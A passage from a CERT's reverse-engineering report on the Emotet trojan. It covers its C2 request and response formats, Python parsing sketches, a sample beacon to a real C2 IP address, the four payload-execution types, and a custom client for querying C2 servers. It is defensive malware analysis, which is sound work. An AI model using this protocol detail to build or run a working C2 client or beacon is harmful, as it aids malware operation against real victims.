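class RequestPayload:
    system_id: str
    system_info: int
    rdp_session_id: int
    other_process_executable_names: str
    payload_ids: List[int]
    current_process_executable_path_hash: int
    date: int = 20200416    # hardcoded in the analyzed sample
    value_1000: int = 1000  # hardcoded in the analyzed sample

    def serialize(self) -> bytes:
        """Concatenate the fields in the order of struct RequestPayload."""
        ids = b"".join(_uint(i) for i in self.payload_ids)
        return b"".join([
            _length_prefixed(self.system_id.encode("ascii")),
            _uint(self.system_info),
            _uint(self.rdp_session_id),
            _uint(self.date),
            _uint(self.value_1000),
            _length_prefixed(self.other_process_executable_names.encode("ascii")),
            _length_prefixed(ids),
            _uint(self.current_process_executable_path_hash),
        ])


sample = RequestPayload(
    system_id="DESKTOPXK1C601_B4A6FEC6",
    system_info=110009,
    rdp_session_id=1,
    other_process_executable_names="conhost.exe,Taskmgr.exe",
    payload_ids=[2643, 2647, 2759],
    current_process_executable_path_hash=0x9F955B9,
)
serialized = sample.serialize()
print(len(serialized))  # 90
```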

Request

The request encapsulates the request payload described before as well as the request flags.
The request flags are used to specify the type of the request payload.

struct Request { 
   uint flags; 
   struct Bytes compressedPayload; 
};

Before serializing the request struct, the serialized request payload is compressed using an
LZ77-style algorithm, forming the compressed request payload. The request struct’s fields
are serialized in the order they appear to form the serialized request, following again the
aforementioned serialization rules.

Finally, the session key is encrypted with the C2 servers’ public key (96 bytes), the serialized
request is hashed (20 bytes) and then encrypted with the session key to form the encrypted
request. The encrypted session key, the request hash and the encrypted request form the
request body. This is illustrated in the following image.

https://github.com/grnet/emotet-utils/blob/master/decompiled/hashLowercase.c



Figure 36. Emotet’s encrypted request
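The layout of the request and of the request body can be sketched in Python as follows. Compression, hashing and encryption are deliberately left out, so the functions operate on bytes that are assumed to have been produced already. The function names are ours, and the sketch assumes that the 96-byte and 20-byte figures are the lengths of the encrypted session key and of the hash as they appear in the body.

```python
import struct

ENCRYPTED_SESSION_KEY_SIZE = 96  # bytes, as stated in the text
REQUEST_HASH_SIZE = 20           # bytes, as stated in the text


def serialize_request(flags: int, compressed_payload: bytes) -> bytes:
    """struct Request: uint flags followed by struct Bytes compressedPayload."""
    return (
        struct.pack("<I", flags)
        + struct.pack("<I", len(compressed_payload))
        + compressed_payload
    )


def split_request_body(body: bytes):
    """Split a request body into (encrypted key, hash, encrypted request)."""
    header = ENCRYPTED_SESSION_KEY_SIZE + REQUEST_HASH_SIZE
    if len(body) < header:
        raise ValueError("request body is too short")
    encrypted_key = body[:ENCRYPTED_SESSION_KEY_SIZE]
    request_hash = body[ENCRYPTED_SESSION_KEY_SIZE:header]
    encrypted_request = body[header:]
    return encrypted_key, request_hash, encrypted_request


# Dummy body, only to demonstrate the offsets.
key, digest, encrypted = split_request_body(bytes(96) + b"\x11" * 20 + b"ciphertext")
print(len(key), len(digest), encrypted)  # 96 20 b'ciphertext'
```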

HTTP request-response

The trojan communicates with the C2 server over plain HTTP, using the WinINet API. In
preparation for the communication, the trojan generates a random URL path, a random
boundary for the multipart/form-data body and random field and file names for the form part
to be submitted. Various headers (e.g. the Accept header) are hardcoded, while others (e.g.
the User-Agent header) are system-dependent. The following is a sample HTTP request sent by
the trojan to a C2 server:

GET /3QDtL0eyVn/macjAF9/ HTTP/1.1 
Host: 46.101.58.37:8080 
Cache-Control: no-cache 
Upgrade-Insecure-Requests: 1 
Referer: 46.101.58.37/ 
Accept-Encoding: gzip, deflate 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E) 
DNT: 1 
Connection: keep-alive 
Content-Type: multipart/form-data; boundary=---------------gby5HOqeZpTWuWuQV0Pq0e 
Content-Length: 5090 
 
-----------------gby5HOqeZpTWuWuQV0Pq0e 
Content-Disposition: form-data; name="iopq"; filename="yyexctg" 
Content-Type: application/octet-stream 
 
<encrypted session key || serialized request hash || encrypted request> 
-----------------gby5HOqeZpTWuWuQV0Pq0e--

And the corresponding HTTP response:


HTTP/1.1 200 OK 
Server: nginx 
Date: Tue, 05 Jan 2021 18:09:55 GMT 
Content-Type: text/html; charset=UTF-8 
Content-Length: 87076 
Connection: keep-alive 
Vary: Accept-Encoding 
 
<compressed response signature || compressed response hash || encrypted response>
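The multipart/form-data body of the sample request above can be assembled as in the following Python sketch. The function names are hypothetical, and the alphabet and lengths of the random tokens are assumptions based only on the sample, not on the generator found in the binary.

```python
import random
import string


def random_token(length: int, rng=random) -> str:
    """Generate a random alphanumeric token (assumed alphabet)."""
    alphabet = string.ascii_letters + string.digits
    return "".join(rng.choice(alphabet) for _ in range(length))


def build_multipart(request_body: bytes, boundary: str,
                    field_name: str, file_name: str) -> bytes:
    """Wrap the request body in a single-part multipart/form-data body."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field_name}"; '
        f'filename="{file_name}"\r\n'
        "Content-Type: application/octet-stream\r\n"
        "\r\n"
    ).encode("ascii")
    tail = f"\r\n--{boundary}--".encode("ascii")
    return head + request_body + tail


# Boundary shaped like the one in the sample: 15 dashes plus a random token.
boundary = "-" * 15 + random_token(22)
body = build_multipart(b"<request body>", boundary, random_token(4), random_token(7))
print(body.decode("ascii"))
```

The boundary passed to build_multipart is the value that would also be announced in the Content-Type header of the request.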

Response

Just like the request body, the response body consists of three parts: the compressed
response’s signature, the compressed response’s hash and the encrypted response. The
signature is generated with the C2 servers’ private key and the compressed response is
encrypted using the session key submitted to the C2 server as part of the request.

Figure 37. Emotet’s encrypted response

Upon decrypting the encrypted response, the trojan retrieves a uint  representing the
decompressed response size followed by the compressed response, which can be
decompressed to the serialized response using the same LZ77-style algorithm that was used
to compress the request. Finally, the serialized response can be deserialized to the following
struct, adhering again to the common serialization rules.

struct Response { 
   struct Bytes serializedPayload; 
   uint flags; 
};

The response flags are used to inform the trojan whether to continue or terminate its
operation after executing the payload.
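The two parsing steps that follow decryption can be sketched in Python as shown below. Decryption and the LZ77-style decompression are not implemented here; the functions only show how the surrounding fields are laid out. The function names are ours, and the meaning of individual flag values is not interpreted.

```python
import struct


def split_decrypted_response(decrypted: bytes):
    """Return (decompressed size, compressed response) from the decrypted data."""
    (decompressed_size,) = struct.unpack_from("<I", decrypted, 0)
    return decompressed_size, decrypted[4:]


def deserialize_response(serialized: bytes):
    """struct Response: struct Bytes serializedPayload followed by uint flags."""
    (length,) = struct.unpack_from("<I", serialized, 0)
    payload = serialized[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated serialized payload")
    (flags,) = struct.unpack_from("<I", serialized, 4 + length)
    return payload, flags


# Dummy data, only to demonstrate the layout.
example = struct.pack("<I", 3) + b"abc" + struct.pack("<I", 7)
print(deserialize_response(example))  # (b'abc', 7)
```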

Response Payload

The serialized response payload is a series of serialized struct Bytes , each of which
contains a serialized response payload struct.


struct ResponsePayload { 
   uint payloadId; 
   uint payloadType; 
   struct Bytes payload; 
};
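A parser for this layout can be sketched in Python as follows. The names are hypothetical, length prefixes are assumed to be 4-byte little-endian uints, and the serializer is included only to build test data for the usage example.

```python
import struct
from typing import List, NamedTuple


class ResponsePayload(NamedTuple):
    payload_id: int
    payload_type: int
    payload: bytes


def _read_bytes(buf: bytes, offset: int):
    """Read one struct Bytes at offset; return (contents, next offset)."""
    (length,) = struct.unpack_from("<I", buf, offset)
    start = offset + 4
    end = start + length
    if end > len(buf):
        raise ValueError("truncated struct Bytes")
    return buf[start:end], end


def parse_response_payloads(serialized: bytes) -> List[ResponsePayload]:
    """Parse a series of struct Bytes, each wrapping one ResponsePayload."""
    payloads = []
    offset = 0
    while offset < len(serialized):
        item, offset = _read_bytes(serialized, offset)
        payload_id, payload_type = struct.unpack_from("<II", item, 0)
        data, _ = _read_bytes(item, 8)
        payloads.append(ResponsePayload(payload_id, payload_type, data))
    return payloads


def serialize_response_payload(p: ResponsePayload) -> bytes:
    """Inverse of the parser, used here only to build example input."""
    inner = struct.pack("<III", p.payload_id, p.payload_type, len(p.payload)) + p.payload
    return struct.pack("<I", len(inner)) + inner


blob = b"".join(serialize_response_payload(p) for p in [
    ResponsePayload(2643, 3, b"MZ..."),
    ResponsePayload(2647, 1, b"MZ"),
])
for parsed in parse_response_payloads(blob):
    print(parsed.payload_id, parsed.payload_type, len(parsed.payload))
```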

Figure 38. Emotet’s serialized response payload

payloadId

Every payload has a unique ID. As discussed in the subsection about the request payload,
this is used to keep track of the payloads that are being executed by each compromised
system. Payload IDs are incremental integers.

payloadType

Each received payload is handled based on the payloadType property. There are 4 payload
types:

Type 1 ( 0x1 ): the payload is an executable (.exe) and it is written to a file which is
executed in a new process, using CreateProcessW() .
Type 2 ( 0x2 ): the payload is an executable (.exe) and it is written to a file which is
executed in a new local user process, using CreateProcessAsUserW() .
Type 3 ( 0x3 ): the payload is a dynamic-link library (.dll), it is loaded into the address
space of the trojan’s process by a custom loader (similar to those discussed in previous
chapters) and then its entrypoint is called in a new thread, using CreateThread() .
Type 4 ( 0x4 ): the payload is an executable (.exe) and it is written to a file which is
executed in a new process, using CreateProcessW() , with command line arguments.
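The four payload types can be summarized in a small Python enumeration. The member names are ours and purely descriptive; only the numeric values and the associated Windows API calls come from the analysis above.

```python
from enum import IntEnum


class PayloadType(IntEnum):
    EXE_NEW_PROCESS = 0x1  # written to disk, started with CreateProcessW()
    EXE_AS_USER = 0x2      # written to disk, started with CreateProcessAsUserW()
    DLL_IN_PROCESS = 0x3   # loaded in-process, entrypoint run via CreateThread()
    EXE_WITH_ARGS = 0x4    # written to disk, CreateProcessW() with arguments


LAUNCH_API = {
    PayloadType.EXE_NEW_PROCESS: "CreateProcessW",
    PayloadType.EXE_AS_USER: "CreateProcessAsUserW",
    PayloadType.DLL_IN_PROCESS: "CreateThread",
    PayloadType.EXE_WITH_ARGS: "CreateProcessW",
}


def is_written_to_disk(payload_type: int) -> bool:
    """Only the executable payload types (1, 2 and 4) are written to a file."""
    return PayloadType(payload_type) is not PayloadType.DLL_IN_PROCESS


print(LAUNCH_API[PayloadType(3)], is_written_to_disk(3))  # CreateThread False
```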

For types 1, 2 and 4, the file is stored in the same directory where the executable of the
trojan resides. Its filename is generated by concatenating the name without the extension of
a random .exe or .dll file in the CSIDL_SYSTEM  ( C:\Windows\System32 ) directory, the
payload ID in a hexadecimal format ( %x ) and the “ .exe ” extension.
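The filename generation can be illustrated with the Python sketch below. The function name is hypothetical and the list of system files is passed in as an argument instead of being enumerated from the system directory. How the trojan picks the random file is not modelled beyond a uniform choice.

```python
import random
from pathlib import PureWindowsPath


def payload_filename(system_files, payload_id: int, rng=random) -> str:
    """Concatenate a random .exe/.dll stem, the payload ID in hex and '.exe'."""
    candidates = [
        name for name in system_files
        if PureWindowsPath(name).suffix.lower() in (".exe", ".dll")
    ]
    stem = PureWindowsPath(rng.choice(candidates)).stem
    return "%s%x.exe" % (stem, payload_id)


# With a single candidate the result is deterministic: 2643 is a53 in hex.
print(payload_filename(["dxdiag.exe", "notes.txt"], 2643))  # dxdiaga53.exe
```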


For type 3, the entry-point is called with a non-standard reason ( 10 ) and the reserved
argument is a pointer to a struct with the system ID and the C2 servers’ public key in DER
format, as shown below.

struct DllArgs { 
   char *systemId; 
   struct Bytes c2PublicKeyDer; 
};

For type 4, the executable is called with a single command line argument, which is a base64-
encoded serialized struct with a handle to the calling process and the parent directory and
name of the calling process’ executable, as shown below. This type is used for updating
Emotet to newer versions.

struct CmdLineArgs { 
   HANDLE *hProcess; 
   WCHAR *directoryAndFilenameWithoutExtension; 
   DWORD directoryAndFilenameWithoutExtensionLength; 
};

payload

The actual data of the payload.

Chapter 5. Monitoring the updates

Introduction

In the previous chapter we thoroughly described the internals of the trojan. Having a good
understanding of the communication protocol between the trojan and the C2 network we
could now communicate with any C2 server, posing as an instance of the trojan. In this final
chapter we show the custom client that we developed in order to communicate with the C2
servers with arbitrary requests and describe the responses that we received. Furthermore,
we briefly describe how we used the Ghidra Scripting API in order to automate repeated
processes of reverse-engineering which proved to be helpful for extracting useful information
out of the received update payloads (e.g. new IP addresses of the C2 network).

Developing a custom “Emotet” client

We have already described the communication between the trojan instances and the C2
network, including the detection of the C2 servers, the structure of the requests and
responses as well as the compression and encryption algorithms. Based on this analysis we
could develop our own Emotet client, which allowed us to perform requests with arbitrary
request payloads. Like the rest of the scripts, the client was implemented in Python. The
source code can be found in client.py. Using this client, we could monitor the uptime of each
of the listed C2 servers and parse the C2 responses.

https://github.com/grnet/emotet-utils/blob/master/utilities/client.py



Most of the C2 responses were loadable DLL extensions to the trojan (type 3). The payloads
received from different C2 servers at the same point in time were identical or almost
identical, differing only in the first 48 bytes of the read-only data section. Some of the
payloads were obfuscated using variations of the techniques described in Chapter 3, while
others were not. The only update (type 4) that we received during our analysis was Europol’s
clean-up client.

According to the collected statistics, only a fraction of the C2 servers were online at any
given time. The set of active C2 servers changed over time, presumably to avoid triggering
alerts and being detected.

Automating repeated reverse-engineering processes

On each received payload we had to repeat the processes that we followed to overcome the
incorporated obfuscation techniques. Since these techniques were slightly different for each
payload (e.g. different XOR keys were used, algorithm constants were modified, variables
were stored in different memory addresses, etc.) we had to develop some pieces of code
implementing some basic logic. We used the Ghidra scripting API and developed Python
scripts that automated repeated processes that required considerable manual effort.
Specifically, the two main processes that were automated are the decryption of the strings
and the resolution of the imported symbols. These basic automations made the analysis of
the received updates significantly easier. Implementation of the algorithms can also be found
in decrypt_bytes.py and generate_symbol_hashes2.py.

Epilogue

In this analysis we documented our defensive strategy against a large trojan-spreading
campaign. Our approach was based on static analysis and reverse engineering. We initially
avoided running any of the trojan’s stages. This was an intentional choice because with
dynamic analysis certain conditions and corner cases could not have been triggered and
whole code paths could have been skipped. After many hours of reverse engineering and
building enough confidence that we had a full understanding of the trojan’s inner workings,
we used dynamic instrumentation to confirm our observations. For the latter we used the
Frida dynamic instrumentation toolkit. Nevertheless, as shown by our work, the dynamic
analysis of malware is not always required in order to understand and analyze its
functionality.

Notice that in this analysis we only focused on analyzing the trojan itself and intentionally
skipped the analysis of payloads spread by the C2 network. From the analysis of the trojan’s
internals in Chapter 4, it became apparent that Emotet enables the C2 servers to run
arbitrary payloads on infected computers. It is known that Emotet had been used in order to
spread banking-related malware, e-mail harvesting malware, as well as ransomware.
However, analyzing those payloads was considered out of the scope of planning a generic
defense against Emotet.

https://github.com/grnet/emotet-utils/blob/master/utilities/decrypt_bytes.py
https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes2.py



Finally, we did not include any analysis of the last payload that our update-monitoring
infrastructure received, which according to our observations and combined with public
reports is Europol’s clean-up payload.

We hope that IT Security professionals will find our work useful for defending against similar
malware in the future.

© 2022 GRNET CERT.